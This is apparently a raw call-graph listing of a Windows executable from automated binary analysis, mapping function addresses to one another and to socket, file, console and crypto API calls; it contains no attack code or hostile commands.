calls 41629->41631 41630->41629 41631->41627 41632->41626 41633 892a48 41767 880ca8 25 API calls 41633->41767 41635->41626 41635->41628 41635->41633 41636 892ad8 41636->41628 41776 87f65c 9 API calls 41636->41776 41638 87d26d 15 API calls 41639 892a6f 41638->41639 41639->41628 41639->41636 41639->41638 41768 87d14a 41639->41768 41642 891b2e 41641->41642 41649 891b55 41641->41649 41778 874899 _gmtime64 41642->41778 41644 891b42 41646 891b4a 41644->41646 41650 891b5e 41644->41650 41645 8b0ca6 _ValidateLocalCookies 5 API calls 41647 891c18 41645->41647 41779 87d6ad 17 API calls _ValidateLocalCookies 41646->41779 41647->41511 41654 89187b 41647->41654 41649->41645 41650->41649 41780 87201d 14 API calls 41650->41780 41652 891be9 41653 87d14a 3 API calls 41652->41653 41653->41649 41658 891896 ___from_strstr_to_strchr 41654->41658 41655 891af2 41655->41526 41656 891af9 41781 87d126 free 41656->41781 41657 891ac8 free 41657->41658 41658->41655 41658->41656 41658->41657 41660 87d26d 15 API calls 41658->41660 41660->41658 41662 8922cd 41661->41662 41670 8925df 41661->41670 41663 89244c 41662->41663 41664 8922df 41662->41664 41665 892455 41663->41665 41680 89249d 41663->41680 41666 8922e4 41664->41666 41686 892342 41664->41686 41667 87d14a 3 API calls 41665->41667 41668 87d14a 3 API calls 41666->41668 41669 892463 41667->41669 41671 8922f2 41668->41671 41674 891207 39 API calls 41669->41674 41702 892325 41669->41702 41672 87d26d 15 API calls 41670->41672 41673 89266f 41670->41673 41711 89243b 41670->41711 41671->41702 41782 891207 41671->41782 41672->41673 41679 87d14a 3 API calls 41673->41679 41693 89269c 41673->41693 41673->41702 41724 892482 41674->41724 41675 8923ba 41688 8923da 41675->41688 41675->41702 41804 8917fa free realloc free 41675->41804 41676 87d26d 15 API calls 41689 8924f0 41676->41689 41677 87d26d 15 API calls 41677->41689 41678 8b0ca6 _ValidateLocalCookies 5 API calls 41684 892993 41678->41684 41679->41693 41680->41676 41680->41689 41682 87d14a 3 API calls 41703 8923f2 41682->41703 41684->41511 41684->41530 41685 89248c 41809 87d6ad 17 API calls _ValidateLocalCookies 41685->41809 41686->41675 41687 87d26d 15 API calls 41686->41687 41687->41675 41688->41682 41688->41702 41689->41677 41699 892527 41689->41699 41689->41702 41691 89231a 41802 87d6ad 17 API calls _ValidateLocalCookies 41691->41802 41692 89232c 41803 88c80b 19 API calls 41692->41803 41701 8926b8 41693->41701 41693->41702 41807 8917fa free realloc free 41693->41807 41704 89253c 41699->41704 41806 8917fa free realloc free 41699->41806 41701->41702 41706 8928b2 41701->41706 41713 892714 41701->41713 41702->41678 41703->41702 41707 891207 39 API calls 41703->41707 41704->41702 41705 87d14a 3 API calls 41704->41705 41715 892599 41705->41715 41710 87d14a 3 API calls 41706->41710 41709 89241c 41707->41709 41708 89286d 41717 87d14a 3 API calls 41708->41717 41709->41711 41712 892426 41709->41712 41720 8928c1 41710->41720 41810 88c80b 19 API calls 41711->41810 41805 87d6ad 17 API calls _ValidateLocalCookies 41712->41805 41713->41708 41716 892748 41713->41716 41715->41702 41718 891207 39 API calls 41715->41718 41719 87d14a 3 API calls 41716->41719 41731 892779 41717->41731 41718->41670 41721 892757 41719->41721 41720->41702 41722 87d14a 3 API calls 41720->41722 41720->41731 41721->41702 41725 892768 41721->41725 41726 89278d 41721->41726 41722->41731 41723 891207 39 API calls 41723->41724 41724->41685 41724->41711 41727 87d14a 3 API calls 41725->41727 41736 892815 41726->41736 41808 87201d 14 API calls 41726->41808 41727->41731 41729 87d14a 3 API calls 41729->41731 41730 8927ac 41732 87d14a 3 API calls 41730->41732 41731->41702 41731->41723 41733 8927ca 41732->41733 41733->41702 41734 87d14a 3 API calls 41733->41734 41735 8927ff 41734->41735 41735->41736 41737 87d14a 3 API calls 41735->41737 41736->41702 41736->41729 41737->41736 41738->41533 41739->41548 41740->41558 41741->41560 41743->41570 41744->41571 41745->41574 41746->41569 41747->41576 41748->41576 41749->41576 41751 871535 14 API calls 41750->41751 41752 87d24f 41751->41752 41753 87d25c 41752->41753 41756 87d126 free 41752->41756 41753->41594 41755 87d268 41755->41594 41756->41755 41757->41601 41758->41603 41759->41610 41760->41611 41761->41615 41762->41612 41763->41616 41764->41620 41765->41622 41766->41604 41767->41639 41769 87d171 41768->41769 41772 87d17e 41768->41772 41777 87d126 free 41769->41777 41771 87d176 41771->41639 41772->41771 41773 87d1ae realloc 41772->41773 41773->41771 41774 87d1b6 free 41773->41774 41774->41771 41776->41636 41777->41771 41778->41644 41779->41649 41780->41652 41781->41655 41784 891251 41782->41784 41783 891280 41815 88aa41 malloc 41783->41815 41784->41783 41786 8912cf 41784->41786 41811 87d75c 41786->41811 41788 89128e 41790 8912a3 41788->41790 41791 891294 41788->41791 41790->41786 41816 87d126 free 41791->41816 41792 89143a 41819 87d126 free 41792->41819 41793 89131a 41817 87dc17 fwrite fwrite 41793->41817 41797 89129c 41798 891442 41797->41798 41798->41691 41798->41692 41799 89133e 41800 891359 41799->41800 41818 87dc17 fwrite fwrite 41799->41818 41800->41792 41800->41797 41802->41702 41803->41702 41804->41688 41805->41702 41806->41704 41807->41701 41808->41730 41809->41702 41810->41702 41812 87d78e 41811->41812 41820 87d7c0 41812->41820 41815->41788 41816->41797 41817->41799 41818->41800 41819->41798 41832 87d482 41820->41832 41823 87d7fd 41826 8b0ca6 _ValidateLocalCookies 5 API calls 41823->41826 41824 87d808 send 41824->41823 41825 87d81f WSAGetLastError 41824->41825 41825->41823 41827 87d839 41825->41827 41828 87d790 41826->41828 41842 87a0b8 23 API calls _strrchr 41827->41842 41828->41792 41828->41793 41830 87d847 41843 87d6ad 17 API calls _ValidateLocalCookies 41830->41843 41833 87d57d 41832->41833 41834 87d4b9 41832->41834 41833->41823 41833->41824 41834->41833 41844 88f235 41834->41844 41837 87d502 41838 87d55b recv 41837->41838 41840 87d52f malloc 41837->41840 41838->41833 41839 87d53f 41838->41839 41839->41833 41840->41839 41841 87d544 41840->41841 41841->41838 41842->41830 41843->41823 41845 88f259 41844->41845 41847 88f273 41844->41847 41846 88f261 41845->41846 41845->41847 41854 88f1f3 WSASetLastError Sleep 41846->41854 41849 88f35e 12 API calls 41847->41849 41853 88f2ca 41849->41853 41850 88f26c 41850->41853 41851 8b0ca6 _ValidateLocalCookies 5 API calls 41852 87d4f6 41851->41852 41852->41833 41852->41837 41853->41851 41854->41850 43041 89d06e 683 API calls 43042 86544b 53 API calls 2 library calls 42408 86a06f fopen 42409 86a0a7 42408->42409 42410 86a087 42408->42410 42447 86d323 42409->42447 42410->42409 42411 86a08f 42410->42411 42459 869199 20 API calls 42411->42459 42414 86a0b1 42415 86a0db 42414->42415 42417 86a0c7 free 42414->42417 42418 86a103 42415->42418 42419 86a0ed 42415->42419 42416 86a030 42420 86a1a0 42416->42420 42465 869b4c 7 API calls 42416->42465 42417->42415 42455 86d8d0 42418->42455 42423 86a0f1 fclose 42419->42423 42424 86a02a 42419->42424 42422 8b0ca6 _ValidateLocalCookies 5 API calls 42420->42422 42426 86c5d1 42422->42426 42423->42424 42458 869199 20 API calls 42424->42458 42429 86a122 fclose 42432 86a12a 42429->42432 42430 86a158 42433 872235 60 API calls 42430->42433 42431 86a15a fopen 42431->42430 42435 86a172 42431->42435 42432->42416 42432->42430 42432->42431 42434 86a151 42432->42434 42436 86a1c1 42433->42436 42460 861018 _fileno _setmode 42434->42460 42461 86913e 20 API calls 42435->42461 42463 8691ba calloc 42436->42463 42440 86a17e free 42462 86fea5 free free free free 42440->42462 42441 86a1d6 42464 8816ca 266 API calls 42441->42464 42444 86a1e8 42444->42416 42445 86c598 fclose 42444->42445 42446 86c5a4 42445->42446 42446->42416 42448 86d363 fgets 42447->42448 42449 86d3ec 42447->42449 42448->42449 42452 86d37d ___from_strstr_to_strchr 42448->42452 42450 8b0ca6 _ValidateLocalCookies 5 API calls 42449->42450 42451 86d403 42450->42451 42451->42414 42452->42449 42454 86d3d2 fgets 42452->42454 42466 870ca0 free realloc free 42452->42466 42454->42449 42454->42452 42467 870dce 42455->42467 42458->42416 42459->42416 42460->42430 42461->42440 42462->42420 42463->42441 42464->42444 42465->42420 42466->42452 42468 870de1 42467->42468 42469 86a110 free 42468->42469 42470 870dea 42468->42470 42469->42429 42469->42432 42475 870d8d malloc 42470->42475 42472 870df3 42473 870e0b 42472->42473 42474 870e08 free 42472->42474 42473->42469 42474->42473 42475->42472 43043 89d060 455 API calls 43044 894c60 19 API calls 43183 898660 20 API calls 43185 8a6660 7 API calls 42647 86ca6a 42648 86ca75 42647->42648 42649 86ca85 42647->42649 42650 86ca7a 42648->42650 42660 86ca8f 42648->42660 42691 869199 20 API calls 42650->42691 42652 86cb58 42652->42649 42694 869b4c 7 API calls 42652->42694 42657 869327 340 API calls 42657->42660 42658 86caf1 Sleep 42658->42660 42660->42652 42660->42657 42660->42658 42661 86923b 42660->42661 42675 8722be 42660->42675 42692 86336a 6 API calls 42660->42692 42693 86920d free 42660->42693 42662 86925e 42661->42662 42673 8692cc 42661->42673 42662->42673 42695 870b16 _open 42662->42695 42663 8b0ca6 _ValidateLocalCookies 5 API calls 42664 8692e9 42663->42664 42664->42660 42666 869273 42667 86927d _fstat64 42666->42667 42668 8692eb 42666->42668 42667->42668 42670 86928e 42667->42670 42697 869159 15 API calls 42668->42697 42670->42673 42696 86f352 61 API calls _ValidateLocalCookies 42670->42696 42671 8692fe 42672 869307 _close __acrt_iob_func _fileno 42671->42672 42671->42673 42672->42673 42673->42663 42676 8722c7 42675->42676 42677 8722cb 42675->42677 42676->42660 42678 8722ef 42677->42678 42679 8722de 42677->42679 42681 876ba2 67 API calls 42678->42681 42682 872301 42678->42682 42709 87d6ad 17 API calls _ValidateLocalCookies 42679->42709 42681->42682 42682->42676 42698 876da2 42682->42698 42684 872331 42685 87234e 42684->42685 42686 872339 42684->42686 42704 872261 42685->42704 42710 878b08 266 API calls 42686->42710 42691->42649 42692->42660 42693->42660 42694->42649 42695->42666 42696->42673 42697->42671 42699 876db1 42698->42699 42703 876dd8 42698->42703 42699->42703 42712 87941d 19 API calls 2 library calls 42699->42712 42701 876e3b 42713 87927c 7 API calls 42701->42713 42703->42684 42707 87226c 42704->42707 42705 87760d 35 API calls 42705->42707 42706 878a2b 102 API calls 42706->42707 42707->42705 42707->42706 42708 8722a9 42707->42708 42711 877276 108 API calls 42708->42711 42709->42676 42710->42676 42711->42676 42712->42701 42713->42703 43186 86544b 32 API calls _ValidateLocalCookies 43047 89d07c 96 API calls 43048 861070 34 API calls _ValidateLocalCookies 43049 873070 fclose free 43051 87bc7e free malloc 43187 894a70 free free 43188 89fa70 120 API calls _ValidateLocalCookies 43052 861580 61 API calls 43190 890380 19 API calls 43191 89df80 690 API calls 43053 89ca57 46 API calls 43192 8a6380 46 API calls 43194 86544b 21 API calls _ValidateLocalCookies 42728 868f92 _mbscmp 42729 868fa6 42728->42729 42730 868fd8 42728->42730 42776 86310d 14 API calls _ValidateLocalCookies 42729->42776 42731 870b38 14 API calls 42730->42731 42733 868fe6 QueryPerformanceFrequency 42731->42733 42746 8631fa GetStdHandle 42733->42746 42734 868fab 42735 868fc8 42734->42735 42777 8720f5 15 API calls 42734->42777 42778 870e10 free free 42735->42778 42740 868fcf 42742 869035 42740->42742 42743 86902a fflush 42743->42742 42744 86900b 42744->42743 42764 868eec 42744->42764 42747 86320c GetConsoleMode 42746->42747 42748 863266 42746->42748 42747->42748 42749 86321c 42747->42749 42755 868e58 __acrt_iob_func malloc 42748->42755 42749->42748 42750 863225 SetConsoleCtrlHandler 42749->42750 42750->42748 42751 863243 SetConsoleMode 42750->42751 42752 86325c 42751->42752 42753 863269 SetConsoleCtrlHandler 42751->42753 42779 8b10ee _crt_atexit _register_onexit_function 42752->42779 42753->42748 42756 868e90 42755->42756 42757 868ed9 42755->42757 42759 872135 31 API calls 42756->42759 42781 869199 20 API calls 42757->42781 42761 868e95 42759->42761 42763 868ea6 42761->42763 42780 869199 20 API calls 42761->42780 42762 868ecb free 42762->42763 42763->42744 42782 8721c0 42764->42782 42767 868f1a 42770 868f32 free 42767->42770 42771 868f28 fclose 42767->42771 42768 868f0b 42768->42767 42769 868f10 fclose 42768->42769 42769->42767 42772 868f64 42770->42772 42773 868f49 42770->42773 42771->42770 42772->42743 42790 86245c 89 API calls 42773->42790 42775 868f56 free 42775->42772 42775->42773 42776->42734 42777->42734 42778->42740 42779->42748 42780->42762 42781->42763 42783 8721c9 42782->42783 42789 868ef6 free 42782->42789 42784 872207 FreeLibrary 42783->42784 42785 87221c 42783->42785 42783->42789 42784->42785 42791 894ed8 42785->42791 42788 872227 WSACleanup 42788->42789 42789->42767 42789->42768 42790->42775 42792 894ee1 FreeLibrary 42791->42792 42793 872221 42791->42793 42792->42793 42793->42788 42793->42789 43195 872f90 free 43196 8a0390 24 API calls 43060 868598 28 API calls 43062 8abd8e 33 API calls _ValidateLocalCookies 42296 86cbae 42297 86cbcd 42296->42297 42325 86cc43 42296->42325 42297->42325 42326 872235 42297->42326 42301 86cbf3 42302 86cc91 42301->42302 42303 872677 3 API calls 42301->42303 42301->42325 42302->42325 42336 8816ca 266 API calls 42302->42336 42305 86cc16 42303->42305 42306 86cc1c _strdup 42305->42306 42307 872677 3 API calls 42305->42307 42308 86cc2d 42306->42308 42309 86cc87 42306->42309 42310 86cc56 42307->42310 42312 872920 free 42308->42312 42311 872920 free 42309->42311 42313 86cc93 42310->42313 42314 86cc5c _strdup 42310->42314 42311->42302 42315 86cc33 42312->42315 42317 872677 3 API calls 42313->42317 42314->42309 42316 86cc6d 42314->42316 42333 869199 20 API calls 42315->42333 42319 872920 free 42316->42319 42320 86cc9d 42317->42320 42322 86cc73 42319->42322 42320->42306 42321 86cca7 42320->42321 42335 86305c 10 API calls _ValidateLocalCookies 42321->42335 42334 869159 15 API calls 42322->42334 42327 872243 42326->42327 42328 872248 42326->42328 42357 872135 42327->42357 42331 86cbde 42328->42331 42337 881cdf calloc 42328->42337 42332 872362 10 API calls 42331->42332 42332->42301 42333->42325 42334->42325 42335->42302 42336->42325 42338 881cfe calloc 42337->42338 42339 881d08 42338->42339 42340 881d10 calloc 42338->42340 42339->42331 42341 881d28 calloc 42340->42341 42342 881d4a 42341->42342 42343 881d36 free 42341->42343 42362 881aee 8 API calls 42342->42362 42343->42339 42346 881d52 42347 881d98 free 42346->42347 42348 881d5f 42346->42348 42364 87d126 free 42347->42364 42363 887f41 6 API calls 42348->42363 42350 881d75 42350->42339 42353 881db6 42365 8814fa 9 API calls 42353->42365 42355 881dbd free 42355->42350 42358 872147 calloc 42357->42358 42361 8721a3 42357->42361 42360 872181 42358->42360 42360->42361 42366 87d282 WSAStartup 42360->42366 42361->42328 42362->42346 42363->42350 42364->42353 42365->42355 42367 87d325 42366->42367 42368 87d2af 42366->42368 42370 8b0ca6 _ValidateLocalCookies 5 API calls 42367->42370 42369 87d31f WSACleanup 42368->42369 42371 87d2bd 42368->42371 42369->42367 42372 87d336 42370->42372 42381 894e72 42371->42381 42372->42361 42377 87d2f6 42379 870b38 14 API calls 42377->42379 42378 87d2d9 GetProcAddress 42378->42377 42380 87d304 QueryPerformanceFrequency 42379->42380 42380->42367 42382 894e7c 42381->42382 42383 87d2c2 42381->42383 42384 870b38 14 API calls 42382->42384 42383->42367 42389 87d33a GetModuleHandleA 42383->42389 42385 894e8a 42384->42385 42386 87d33a 11 API calls 42385->42386 42387 894ea1 42386->42387 42387->42383 42388 894eaa GetProcAddress 42387->42388 42388->42383 42390 87d35c GetProcAddress _mbspbrk 42389->42390 42397 87d2d0 42389->42397 42391 87d391 42390->42391 42392 87d380 42390->42392 42394 87d395 GetProcAddress 42391->42394 42395 87d3bf GetSystemDirectoryA 42391->42395 42393 87d388 LoadLibraryA 42392->42393 42396 87d384 LoadLibraryExA 42392->42396 42393->42397 42394->42395 42398 87d3a7 42394->42398 42395->42397 42399 87d3d4 malloc 42395->42399 42396->42397 42397->42377 42397->42378 42398->42396 42403 87d402 GetSystemDirectoryA 42399->42403 42407 87d448 free 42399->42407 42405 87d410 42403->42405 42403->42407 42406 87d45d LoadLibraryA 42405->42406 42405->42407 42406->42407 42407->42397 43197 899ba0 46 API calls 43198 87cfae 41 API calls 43064 8a51a0 49 API calls 43200 8abfa1 QueryPerformanceCounter GetTickCount 42794 877bff 310 API calls 43204 861fb0 _lseeki64 43207 869bbc 97 API calls 43070 869d51 134 API calls _ValidateLocalCookies 43071 86a5c4 25 API calls 43210 86544b 22 API calls _ValidateLocalCookies 43211 8a63c0 26 API calls 43075 8651d6 21 API calls 43076 86544b 24 API calls _ValidateLocalCookies 43213 863bd0 __acrt_iob_func fseek 43214 8a5fd0 158 API calls 43215 88db05 41 API calls _ValidateLocalCookies 43081 8b11d0 _set_new_mode SetUnhandledExceptionFilter 43082 8abdd5 16 API calls _ValidateLocalCookies 41458 877bff 450 API calls 43216 86544b 34 API calls _ValidateLocalCookies 41855 8631e0 41856 8631e9 41855->41856 41857 8631f4 41856->41857 41859 8631c0 41856->41859 41860 8631df 41859->41860 41861 8631cd SetConsoleMode 41859->41861 41860->41857 41861->41860 43083 8769e0 7 API calls 43217 8703e0 29 API calls 43218 872fe0 fopen fread 42476 8b11e2 42477 8b11ee ___scrt_is_nonwritable_in_current_image 42476->42477 42500 8b0f27 42477->42500 42479 8b134e 42510 8b155b IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 42479->42510 42481 8b1355 exit 42483 8b135b _exit 42481->42483 42482 8b11f5 42482->42479 42484 8b121f 42482->42484 42485 8b1223 _initterm_e 42484->42485 42488 8b126c ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 42484->42488 42486 8b124f _initterm 42485->42486 42487 8b123e 42485->42487 42486->42488 42489 8b12c0 _get_initial_narrow_environment __p___argv __p___argc 42488->42489 42492 8b12b8 _register_thread_local_exe_atexit_callback 42488->42492 42490 868f6e 42489->42490 42491 8b12dc 42490->42491 42508 8b167b GetModuleHandleW 42491->42508 42492->42489 42494 8b12e6 42494->42481 42495 8b12ea 42494->42495 42496 8b12ee _cexit 42495->42496 42497 8b12f3 42495->42497 42496->42497 42509 8b1099 8 API calls ___scrt_uninitialize_crt 42497->42509 42499 8b12fc 42499->42487 42501 8b0f30 42500->42501 42511 8b137a IsProcessorFeaturePresent 42501->42511 42503 8b0f3c 42512 8b1dbb 11 API calls 2 library calls 42503->42512 42505 8b0f41 ___scrt_uninitialize_crt 42506 8b0f45 42505->42506 42513 8b1dda 8 API calls 2 library calls 42505->42513 42506->42482 42508->42494 42509->42499 42510->42481 42511->42503 42512->42505 42513->42506 43219 89dfe0 51 API calls 43084 87bded 17 API calls 43220 8a63e0 14 API calls 42714 877bff 401 API calls 43222 867beb 24 API calls ___from_strstr_to_strchr 43223 8a27fa strncmp 43225 8a57f0 42 API calls _ValidateLocalCookies 43228 89cff6 88 API calls 43229 8b1309 _seh_filter_exe 43088 86544b 84 API calls _ValidateLocalCookies 43089 869d02 29 API calls _ValidateLocalCookies 43230 861b00 61 API calls _ValidateLocalCookies 43231 863b00 25 API calls 43232 87aa59 105 API calls 42514 87850e 42515 878536 42514->42515 42526 877db0 42515->42526 42546 88bb23 42515->42546 42518 8786a9 42521 878773 42518->42521 42523 8786c5 42518->42523 42524 87874d free 42518->42524 42536 87878c 42518->42536 42519 878616 42519->42518 42520 876f2d 102 API calls 42519->42520 42581 88c6a7 19 API calls 42519->42581 42520->42519 42525 876f2d 102 API calls 42521->42525 42527 87836c 42523->42527 42531 8786e0 free 42523->42531 42524->42521 42528 878781 42525->42528 42526->42527 42544 877bff 42526->42544 42585 877961 102 API calls 42526->42585 42583 88c1fd 108 API calls 42528->42583 42582 88c1fd 108 API calls 42531->42582 42533 890211 20 API calls 42533->42544 42535 8786fa free 42535->42527 42541 87871d 42535->42541 42536->42526 42584 87941d 19 API calls 2 library calls 42536->42584 42537 8795e3 19 API calls 42537->42544 42539 8789ca 42543 876f2d 102 API calls 42541->42543 42543->42526 42544->42533 42544->42537 42544->42539 42545 882166 82 API calls 42544->42545 42580 877961 102 API calls 42544->42580 42586 889e52 18 API calls 42544->42586 42545->42544 42547 88bb58 42546->42547 42548 88bb9e 42547->42548 42549 88f235 12 API calls 42547->42549 42550 88bbab 42548->42550 42551 88bbc0 42548->42551 42549->42548 42610 87d6ad 17 API calls _ValidateLocalCookies 42550->42610 42556 88bbdd 42551->42556 42587 88b0ce 42551->42587 42554 88bbfe 42611 88b751 54 API calls 42554->42611 42555 88bc14 42558 89480b 2 API calls 42555->42558 42556->42554 42556->42555 42563 88bbb6 42556->42563 42566 88bc1d 42558->42566 42559 88bc0b 42559->42555 42559->42563 42560 88bca7 42561 890211 20 API calls 42560->42561 42562 88bcb5 42561->42562 42562->42563 42612 89497a 19 API calls 42562->42612 42563->42519 42565 88bcd3 42565->42563 42567 87dd6c 7 API calls 42565->42567 42573 88bd4d 42565->42573 42566->42560 42569 87d632 17 API calls 42566->42569 42570 88bcf2 42567->42570 42568 88bdf9 42571 890211 20 API calls 42568->42571 42569->42560 42570->42563 42575 88bd52 42570->42575 42576 88bd15 42570->42576 42571->42563 42572 88bdce 42572->42568 42616 87d6ad 17 API calls _ValidateLocalCookies 42572->42616 42573->42568 42573->42572 42615 87d6ad 17 API calls _ValidateLocalCookies 42573->42615 42614 87d6ad 17 API calls _ValidateLocalCookies 42575->42614 42613 87d6ad 17 API calls _ValidateLocalCookies 42576->42613 42580->42544 42581->42519 42582->42535 42583->42536 42584->42526 42585->42544 42586->42544 42598 88b108 42587->42598 42589 88f716 7 API calls 42589->42598 42590 89480b 2 API calls 42590->42598 42592 87d632 17 API calls 42607 88b63a 42592->42607 42593 88b2b7 42595 87d632 17 API calls 42593->42595 42596 88b2d1 42593->42596 42595->42596 42596->42592 42596->42607 42598->42589 42598->42590 42598->42593 42598->42596 42600 88b35a 42598->42600 42601 88b641 42598->42601 42605 87d632 17 API calls 42598->42605 42598->42607 42608 87da02 57 API calls 42598->42608 42617 87dbb6 42598->42617 42621 893eb5 167 API calls 42598->42621 42622 892e63 17 API calls 42598->42622 42623 8a6c36 58 API calls 42598->42623 42624 899e9e 57 API calls 42598->42624 42599 87dc17 fwrite fwrite 42599->42600 42600->42598 42600->42599 42602 88b65b 42601->42602 42603 88b646 42601->42603 42626 87d6ad 17 API calls _ValidateLocalCookies 42602->42626 42625 87d6ad 17 API calls _ValidateLocalCookies 42603->42625 42605->42598 42607->42556 42608->42598 42610->42563 42611->42559 42612->42565 42613->42573 42614->42573 42615->42572 42616->42572 42618 87dc00 42617->42618 42627 87d8c0 42618->42627 42621->42598 42622->42598 42623->42598 42624->42598 42625->42607 42626->42607 42639 87d586 42627->42639 42630 87d906 recv 42631 87d91d WSAGetLastError 42630->42631 42632 87d901 42630->42632 42631->42632 42634 87d935 42631->42634 42633 8b0ca6 _ValidateLocalCookies 5 API calls 42632->42633 42635 87d979 42633->42635 42643 87a0b8 23 API calls _strrchr 42634->42643 42635->42598 42637 87d943 42644 87d6ad 17 API calls _ValidateLocalCookies 42637->42644 42640 87d59d 42639->42640 42641 87d5a4 42639->42641 42640->42630 42640->42632 42641->42640 42642 87d609 free 42641->42642 42642->42640 42643->42637 42644->42632 43092 89c900 87 API calls 43233 89db00 free free free free 43234 86544b 78 API calls _ValidateLocalCookies 43235 8b131d _c_exit _exit GetModuleHandleW 43236 861f10 _read 43093 865480 8 API calls _ValidateLocalCookies 43237 87831f 19 API calls 43238 8a0710 71 API calls _ValidateLocalCookies 43096 8b1110 17 API calls 2 library calls 43239 8b0b10 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 43097 8abd2a 51 API calls _ValidateLocalCookies 43240 870320 24 API calls __alldvrm 43100 86d136 16 API calls _strrchr 42795 86cf30 42823 8632d3 42795->42823 42798 86cf54 calloc 42802 86cf70 calloc 42798->42802 42799 86cf45 42866 869199 20 API calls 42799->42866 42801 86ceee 42803 86cf7e 42802->42803 42833 87963b 42803->42833 42806 87963b 133 API calls 42807 86cfa8 42806->42807 42808 87963b 133 API calls 42807->42808 42809 86cfb4 42808->42809 42810 87963b 133 API calls 42809->42810 42811 86cfc0 42810->42811 42812 87963b 133 API calls 42811->42812 42814 86cfcc 42812->42814 42815 86cfef 42814->42815 42852 86da2f 42814->42852 42867 87978f 268 API calls 42815->42867 42817 86d00c 42817->42801 42818 86d016 42817->42818 42868 86343b 7 API calls 42818->42868 42820 86d01b 42869 863460 26 API calls 42820->42869 42822 86d022 42822->42801 42824 870dce 2 API calls 42823->42824 42825 8632ea 42824->42825 42826 86330a 42825->42826 42827 8632f4 malloc 42825->42827 42831 86330f 42825->42831 42871 863279 free free free 42826->42871 42829 863303 42827->42829 42830 863319 42827->42830 42870 870e10 free free 42829->42870 42830->42831 42831->42798 42831->42799 42834 87964f 42833->42834 42848 86cf9c 42833->42848 42835 879673 42834->42835 42836 8796fd 42834->42836 42834->42848 42840 8796c2 42835->42840 42841 8796ec 42835->42841 42835->42848 42837 879767 42836->42837 42838 879706 42836->42838 42839 87976c 42837->42839 42837->42848 42843 879741 42838->42843 42844 879710 42838->42844 42838->42848 42874 880830 75 API calls 42839->42874 42840->42848 42850 8796e4 free 42840->42850 42841->42848 42872 880e3f 11 API calls 42841->42872 42845 879746 calloc 42843->42845 42843->42848 42844->42848 42873 888f8c 60 API calls 42844->42873 42851 87975d calloc 42845->42851 42847 879778 42847->42848 42848->42806 42850->42848 42851->42848 42854 86da96 42852->42854 42858 86da54 42852->42858 42853 86dae7 42856 86daf5 _strdup 42853->42856 42864 86da9a 42853->42864 42861 86dac4 42854->42861 42854->42864 42875 86d77a 25 API calls 2 library calls 42854->42875 42860 86db07 42856->42860 42856->42864 42859 86d8d0 2 API calls 42858->42859 42862 86da76 42858->42862 42859->42862 42877 869199 20 API calls 42860->42877 42861->42853 42861->42864 42876 86d77a 25 API calls 2 library calls 42861->42876 42862->42854 42862->42864 42865 86d8d0 2 API calls 42862->42865 42864->42814 42865->42854 42866->42801 42867->42817 42868->42820 42869->42822 42870->42826 42871->42831 42872->42848 42873->42848 42874->42847 42875->42861 42876->42853 42877->42864 43244 86544b 26 API calls 2 library calls 42896 877f39 42909 87e820 42896->42909 42899 876f2d 102 API calls 42900 877ebc 42899->42900 42907 877bff 42900->42907 42947 877961 102 API calls 42900->42947 42901 8795e3 19 API calls 42901->42907 42903 890211 20 API calls 42903->42907 42905 8789ca 42907->42901 42907->42903 42907->42905 42908 882166 82 API calls 42907->42908 42946 877961 102 API calls 42907->42946 42948 889e52 18 API calls 42907->42948 42908->42907 42910 87e873 42909->42910 42934 87e869 42909->42934 42911 89480b 2 API calls 42910->42911 42912 87e87f 42911->42912 42914 87e894 42912->42914 42944 87e8e2 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 42912->42944 42913 8b0ca6 _ValidateLocalCookies 5 API calls 42915 877f49 42913->42915 42916 87e6db 447 API calls 42914->42916 42915->42899 42915->42900 42917 87e8ae 42916->42917 42921 87e7cc 33 API calls 42917->42921 42917->42934 42918 88f235 12 API calls 42918->42944 42919 87ec06 42920 87dd6c 7 API calls 42919->42920 42922 87ec1b 42920->42922 42921->42934 42924 87ec26 42922->42924 42927 87ec67 42922->42927 42923 87e272 SleepEx getsockopt WSAGetLastError 42923->42944 42969 87d6ad 17 API calls _ValidateLocalCookies 42924->42969 42925 87eb5c 42926 87ebab 42925->42926 42929 87f3fc 2 API calls 42925->42929 42949 87e6db 42926->42949 42927->42934 42970 87e30b 446 API calls 42927->42970 42929->42926 42932 87ea72 WSASetLastError 42932->42944 42934->42913 42937 87ec9a 42937->42934 42971 87a0b8 23 API calls _strrchr 42937->42971 42940 87d632 17 API calls 42940->42944 42941 87ecef 42972 87d6ad 17 API calls _ValidateLocalCookies 42941->42972 42942 87dd6c 7 API calls 42942->42944 42944->42918 42944->42919 42944->42923 42944->42925 42944->42932 42944->42940 42944->42942 42945 87e30b 446 API calls 42944->42945 42967 88e310 14 API calls 42944->42967 42968 87a0b8 23 API calls _strrchr 42944->42968 42945->42944 42946->42907 42947->42907 42948->42907 42950 87e6fb 42949->42950 42958 87e772 42949->42958 42951 87e798 42950->42951 42952 87e779 42950->42952 42954 87e762 42950->42954 42975 88d2ae 419 API calls _ValidateLocalCookies 42951->42975 42974 88d818 447 API calls _ValidateLocalCookies 42952->42974 42954->42952 42956 87e767 42954->42956 42973 87d6ad 17 API calls _ValidateLocalCookies 42956->42973 42958->42934 42959 87e7cc 42958->42959 42960 87e7ee 42959->42960 42961 87e7fa 42959->42961 42963 88f716 7 API calls 42960->42963 42962 87e64d 31 API calls 42961->42962 42964 87e80b 42962->42964 42963->42961 42976 882e23 17 API calls 42964->42976 42966 87e815 42966->42934 42967->42944 42968->42944 42969->42934 42970->42937 42971->42941 42972->42934 42973->42958 42974->42958 42975->42958 42976->42966 43245 86af39 65 API calls _ValidateLocalCookies 43108 897140 27 API calls 43109 8a7d40 21 API calls 43110 87bd49 free free malloc 43111 873d50 feof fclose 43112 86544b 21 API calls _ValidateLocalCookies 43113 89a550 strtol 43250 8ac750 CryptGetHashParam CryptGetHashParam CryptDestroyHash CryptReleaseContext 43114 86544b 43 API calls _ValidateLocalCookies 40939 86cd66 40942 86c72b 40939->40942 40965 87027a 40942->40965 40944 86c74c _time64 40969 876ba2 calloc 40944->40969 40947 86c77b 40949 86c98c 41134 878b08 266 API calls 40949->41134 40951 86c97a 41133 86e407 17 API calls 2 library calls 40951->41133 40957 86c9b1 _time64 40964 86c797 40957->40964 40962 86c8d9 _time64 40962->40964 40964->40949 40964->40951 40964->40957 40964->40962 40986 87760d 40964->40986 41015 878a2b 40964->41015 